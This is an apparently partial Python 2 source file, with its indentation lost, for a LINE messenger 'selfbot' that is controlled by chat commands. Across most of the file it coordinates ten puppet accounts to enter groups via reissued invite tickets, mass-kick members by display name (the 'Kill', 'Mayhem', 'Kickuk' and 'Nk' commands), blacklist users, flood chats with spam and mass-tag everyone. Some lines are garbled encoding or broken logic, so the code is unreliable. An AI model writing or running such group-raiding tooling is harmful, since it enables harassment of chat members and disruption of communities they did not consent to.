if msg.from_ in Bots or staff:
if wait["ProtectQR"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["ProtectQR"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Proc on","proc on"]:
if msg.from_ in Bots or staff:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Proc off","proc off"]:
if msg.from_ in Bots or staff:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]:
if msg.from_ in admin or staff:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オフ","K off","Contact off","顯示:關"]:
if msg.from_ in admin or staff:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オン","Join on","Auto join:on","自動åƒåŠ ï¼šé–‹"]:
if msg.from_ in admin or staff:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オフ","Join off","Auto join:off","自動åƒåŠ ï¼šé—œ"]:
if msg.from_ in admin or staff:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒ç»ã€‚è¦æ—¶å¼€è¯·æŒ‡å®šäººæ•°å‘é€")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°ç»„用自动邀请拒ç»")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin or staff:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if msg.from_ in admin or staff:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin or staff:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin or staff:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["View"]:
md = ""
if wait["MProtection"] == True: md+=" MProtection : on\n"
else: md+=" MProtection : off\n"
if wait["Protectcancel"] == True: md+=" Protect Cancel : on\n"
else: md+=" Protect Cancel : off\n"
if wait["ProtectQR"] == True: md+=" Protect Qr : on\n"
else: md+=" Protect Qr : off\n"
if wait["Protectguest"] == True: md+=" Block Invite : on\n"
else: md+=" Block Invite : off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
if wait["atjointicket"] == True: md+=" Auto Join Group by Ticket : on\n"
else:md+=" Auto Join Group by Ticket : off\n"
cl.sendText(msg.to,md)
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id","群組全id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin or staff:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif "album remove→" in msg.text:
gid = msg.text.replace("album remove→","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•候語確èª"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é 留言:開"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["コメント:オフ","Comment on","Comment off","自動首é 留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["Comment","留言確èª"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Jam on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["Jam off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif msg.text in ["Change clock "]:
n = msg.text.replace("Change clock ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Jam Update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif msg.text == "$set":
cl.sendText(msg.to, "Check sider")
ki.sendText(msg.to, "Check sider")
kk.sendText(msg.to, "Check sider")
kc.sendText(msg.to, "Check sider")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "$read":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "People who readed %s\nthat's it\n\nPeople who have ignored reads\n%sIt is abnormal ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "An already read point has not been set.\n「set」you can send ♪ read point will be created ♪")
#-----------------------------------------------
#-----------------------------------------------
elif msg.text in ["Join","one","One"]:
if msg.from_ in admin or Bots:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
cl.updateGroup(G)
elif msg.text in ["All","masuk"]:
if msg.from_ in Bots or staff:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
cl.updateGroup(G)
#-----------------------------------------------
elif msg.text in ["Bye wm"]:
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
elif msg.text in ["Bye"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
except:
pass
#-----------------------------------------------
#-------------Fungsi Tagall User Start---------------#
elif msg.text in ["tagall","Tag all"]:
group = cl.getGroup(msg.to)
jw = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for rs in jw:
xname = cl.getContact(rs).displayName
xlen = int(len('x')+1)
akh = akh + xlen
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(rs)+"},"""
strt = strt + int(len('x')+3)
akh = akh + 2
cb2 += "@x \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-----------------------------------------------
elif msg.text in ["Kill"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
group = ki.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
ki.sendText(msg.to,"Sorry!!")
ki2.sendText(msg.to,"(´・ω・`)")
return
for jj in matched_list:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#---------------kickall started----------------#
elif "Mayhem" in msg.text:
if msg.from_ in Bots or staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Mayhem","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
#gs = ki4.getGroup(msg.to)
#gs = ki5.getGroup(msg.to)
ki.sendText(msg.to,"「 Mayhem 」\nMayhem is STARTING♪\n abort to abort♪")
ki2.sendText(msg.to,"「 Mayhem 」\n46 victims shall yell hul·la·ba·loo♪\nhələbəˈlo͞o hələbəˌlo͞o")
ki3.sendText(msg.to,"Good Bye (*´・ω・*)")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to,"Not Found")
else:
for target in targets:
if target not in Bots and staff:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki3.sendText(msg.to,"Mayhem done")
#----------------kickall finish----------------------#
elif "Kickuk" in msg.text:
if msg.from_ in admin or staff:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Kickuk","")
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
#ki.sendText(msg.to,"Just some casual cleansing ô")
#ki2.sendText(msg.to,"Group cleansed.")
#ki3.sendText(msg.to,"Fuck You All")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found.")
ki2.sendText(msg.to,"Not found.")
ki3.sendText(msg.to,"Not found.")
else:
for target in targets:
if target not in Bots and admin:
try:
klist=[ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
ki2.sendText(msg.to,"Group cleanse")
ki3.sendText(msg.to,"Group cleanse")
elif "Nk " in msg.text:
if msg.from_ in Bots or staff:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl,ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Sorry...")
ki3.sendText(msg.to,"(´・ω・`)")
elif "Blacklist @ " in msg.text:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
k3.sendText(msg.to,"Succes ")
except:
ki.sendText(msg.to,"error")
elif "Banned @" in msg.text:
if msg.from_ in Bots or staff:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
#ki.sendText(msg.to,"Dilarang Banned Bot")
#ki2.sendText(msg.to,"Dilarang Banned Bot")
#ki3.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun telah sukses di banned")
except:
ki.sendText(msg.to,"Error")
elif "Unbanned @" in msg.text:
if msg.from_ in Bots or staff:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
#ki.sendText(msg.to,"Tidak Ditemukan.....")
#ki2sendText(msg.to,"Tidak Ditemukan.....")
#ki3.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#-----------------------------------------------
elif msg.text in ["Test"]:
ki.sendText(msg.to,"Ok double thumbs up")
ki2.sendText(msg.to,"Ok double thumbs up")
ki3.sendText(msg.to,"Ok double thumbs up")
#-----------------------------------------------
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
#-----------------------------------------------
elif msg.text in ["say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
ki2.sendText(msg.to,"Hi buddy Har Har")
ki3.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["say hinata pekok"]:
ki.sendText(msg.to,"Hinata pekok Har Har")
ki2.sendText(msg.to,"Hinata pekok Har Har")
ki3.sendText(msg.to,"Hinata pekok Har Har")
elif msg.text in ["#welcome"]:
ki.sendText(msg.to,"Selamat datang di Chivas Family Room")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
#-----------------------------------------------
elif msg.text in ["Respon","respon"]:
ki.sendText(msg.to,"(`・ω・`)")
ki2.sendText(msg.to,"(`・ω・`)")
ki3.sendText(msg.to,"(`・ω・`)")
ki4.sendText(msg.to,"(`・ω・`)")
ki5.sendText(msg.to,"(`・ω・`)")
ki6.sendText(msg.to,"(`・ω・`)")
ki7.sendText(msg.to,"(`・ω・`)")
ki8.sendText(msg.to,"(`・ω・`)")
ki9.sendText(msg.to,"(`・ω・`)")
ki10.sendText(msg.to,"(`・ω・`)")
#-----------------------------------------------
elif "Spam " in msg.text:
if msg.from_ in Bots or staff:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 60:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Kelebihan batas:v")
elif txt[1] == "off":
if jmlh <= 100:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Kelebihan batas :v")
elif msg.text in ["Speed","Speedbot","speedbot"]:
if msg.from_ in Bots or staff:
start = time.time()
cl.sendText(msg.to, "Waiting...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
elif "Add staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in Bots:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Add admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin add executing"
_name = msg.text.replace("Add admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the admin list")
except:
pass
print "[Command]admin add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove admin @" in msg.text:
if msg.from_ in Bots:
print "[Command]admin remove executing"
_name = msg.text.replace("Remove admin @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
#gs = kk.getGroup(msg.to)
#gs = kc.getGroup(msg.to)
#gs = kg.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the admin list")
except:
pass
print "[Command]admin remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Staff list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Stafflist executed"
elif msg.text in ["Admin list","admin list"]:
if admin == []:
ki.sendText(msg.to,"The stafflist is empty")
else:
ki.sendText(msg.to,"Admin list:")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Adminlist executed"
elif msg.text in ["Ip Like", "Ar like"]:
if msg.from_ in staff:
print "[Command]Like executed"
cl.sendText(msg.to,"Trying to Like post(s) from staff")
try:
likePost()
except:
pass
#------------------------------------------------------------------
elif msg.text in ["Banned"]:
if msg.from_ in admin or staff:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin or staff:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact")
#---------Fungsi Banlist With Tag--------#
elif msg.text in ["Banlist","ip banlist"]:
if wait["blacklist"] == {}:
ki.sendText(msg.to,"No user is Blacklisted")
else:
ki.sendText(msg.to,"Blacklisted user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +ki.getContact(mi_d).displayName + "\n"
ki.sendText(msg.to,mc)
print "[Command]Banlist executed"
